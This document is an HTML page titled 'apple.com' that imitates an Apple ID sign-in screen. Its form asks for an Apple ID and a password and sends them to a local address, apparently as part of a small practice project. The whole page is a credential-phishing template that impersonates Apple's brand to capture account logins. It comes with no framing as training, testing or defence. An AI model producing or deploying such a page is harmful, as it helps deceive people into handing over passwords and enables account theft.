<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <title>apple.com</title>

    <style>
        .main{
            background-color: black;
            height: 100vh;
            background-size: cover;
        }
        .main1{
            text-align: center;  
        }
        .m2{
            color: white;
            margin-left: 560px;
            font-size: 30px;
            
        }
        .m3{
            color: white;
            margin-left: 560px;
            font-size: 30px;
        }
        .m4{
            
            margin-left: 660px;
            font-size: 20px;
            border-radius: 10px;
            color: black !important;
        
        }
    </style>

</head>
<body>
    <div class="main">
        <div class="main1">
            <img src="https://substackcdn.com/image/fetch/f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ed3d547-94ff-48e1-9f20-8c14a7030a02_2000x2000.jpeg" height="500px"  />
        </div>
            <form>
                <label class="m2" for="mail">Apple-ID:</label>
                <input type="email" id="mail" name="rich" placeholder="Apple-ID" required>
                <br>
                <br>
                <br>
                <label class="m3" for="maill">Password:</label>
                <input type="password" id="maill" name="rich" required>
                <br>
                <br>
                <br>
                <br>
                <br>
                <input class="m4" type="submit" formaction="http://127.0.0.1:3000/newproject/apple.html">
            </form>      
         </div>
    </div>  
</body>
</html>
